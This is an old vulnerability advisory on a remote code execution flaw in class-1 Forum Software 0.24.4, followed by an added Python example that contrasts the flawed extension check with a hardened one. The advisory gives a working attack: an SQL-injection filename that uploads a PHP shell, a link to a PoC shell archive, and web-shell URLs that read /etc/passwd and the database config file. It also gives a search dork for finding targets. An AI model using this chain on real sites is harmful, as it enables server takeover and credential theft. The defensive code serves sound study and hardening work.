Google Search: “Powered by and copyright class-1″ 0.24.4
rgod rates this entry 10 out of 10.
Submitted: 2005-09-08 00:00:00
Added by: rgod
class-1 Forum Software v 0.24.4 Remote code execution

software: class-1 Forum Software v 0.24.4
site: http://www.class1web.co.uk/software
description: class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributed under the GNU General Public License, which means that its source is freely distributed and available to the general public.

vulnerability: the way the forum checks attachment extensions...
look at the vulnerable code at viewforum.php, lines 256-272.
nothing seems so strange, but... what happens if you try to upload a file with this name?

shell.php.' or 'a' ='a

;) SQL INJECTION!
The query (and other queries like this) becomes:

SELECT * FROM [extensions table name] WHERE extension='' or 'a' ='a' AND file_type='Image'

you have bypassed the check... now an executable file is uploaded, because for Apache, both on Windows and Linux, a file with that name is an executable php file...

you can download a poc file from my site, at url:
http://rgod.altervista.org/shell.zip
inside we have:

you can do the test manually: unzip the file, register, login, post this file as attachment, then go to this url to see the directory where the attachment has been uploaded:
http://[target]/[path]/viewattach.php
you will be redirected to:
http://[target]/[path]/[upload_dir]/
then launch commands:
http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20/etc/passwd
to see the /etc/passwd file
http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20./../db_config.inc
to see the database username and password
and so on...

you can see my poc exploit at this url:
http://www.rgod.altervista.org/class1.html

googledork: "Powered by and copyright class-1"

rgod
site: http://rgod.altervista.org
mail: retrogod [at] aliceposta . it
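The root cause is an extension value concatenated straight into the SQL of the allow-list lookup, so the "extension" part of a filename becomes query text. The following is an added example (not code from class-1 or from the advisory) that models that lookup with an in-memory SQLite table and places the naive string-built check next to a hardened one. The table name allowed_extensions and its sample rows are constructed; the advisory only gives the column names extension and file_type and the value 'Image'. The hardened check validates the extension syntactically before any query runs, uses a parameterized query, and stores the file under a server-chosen name with exactly one extension, so a client-supplied name never reaches the database or the filesystem.

```python
import re
import secrets
import sqlite3
from typing import Optional


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the forum's allowed-extensions table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE allowed_extensions (extension TEXT, file_type TEXT)")
    conn.executemany(
        "INSERT INTO allowed_extensions VALUES (?, ?)",
        [("jpg", "Image"), ("gif", "Image"), ("png", "Image")],
    )
    return conn


def extension_of(filename: str) -> str:
    """Text after the last dot: the piece a naive check feeds to its query."""
    return filename.rsplit(".", 1)[1] if "." in filename else ""


def vulnerable_check(conn: sqlite3.Connection, filename: str) -> bool:
    """The pattern the advisory describes: the extension is concatenated into SQL.

    For the advisory's filename the WHERE clause becomes
    extension='' or 'a' ='a' AND file_type='Image', which matches every image row,
    so the lookup "succeeds" for a name that is not an image at all.
    """
    sql = (
        "SELECT * FROM allowed_extensions WHERE extension='"
        + extension_of(filename)
        + "' AND file_type='Image'"
    )
    return conn.execute(sql).fetchone() is not None


# Syntactic allow-list for an extension: short and alphanumeric, nothing else.
SAFE_EXT = re.compile(r"[a-z0-9]{1,8}")


def hardened_check(conn: sqlite3.Connection, filename: str) -> Optional[str]:
    """Return a server-chosen storage name for an acceptable upload, else None.

    Three independent defences:
      1. the extension must match SAFE_EXT before any query runs, so quotes,
         spaces and dots can never reach the database;
      2. the lookup is a parameterized query, so the value is data, not SQL;
      3. the stored file gets a random name with exactly one extension, so the
         client-supplied name (including any extra dotted segments such as
         ".php." that Apache may interpret) never becomes a path on disk.
    """
    ext = extension_of(filename).lower()
    if not SAFE_EXT.fullmatch(ext):
        return None
    row = conn.execute(
        "SELECT 1 FROM allowed_extensions WHERE extension=? AND file_type='Image'",
        (ext,),
    ).fetchone()
    if row is None:
        return None
    return f"{secrets.token_hex(16)}.{ext}"


# The filename from the advisory, used only to show that the two checks disagree.
ADVISORY_FILENAME = "shell.php.' or 'a' ='a"

if __name__ == "__main__":
    db = build_db()
    for name in ("photo.jpg", "shell.php", ADVISORY_FILENAME):
        print(f"{name!r}: naive={vulnerable_check(db, name)} "
              f"hardened={hardened_check(db, name)}")
```

Running the block shows the naive check accepting the advisory's filename while rejecting plain shell.php, which is exactly the bypass the query above describes; the hardened check rejects both and accepts only a real image extension, returning a random storage name such as <32 hex chars>.jpg. The regex gate alone would already block this payload, but the parameterized query is what removes the injection class entirely, and the server-chosen name is what stops a double-extension trick even if some other path were to accept the upload.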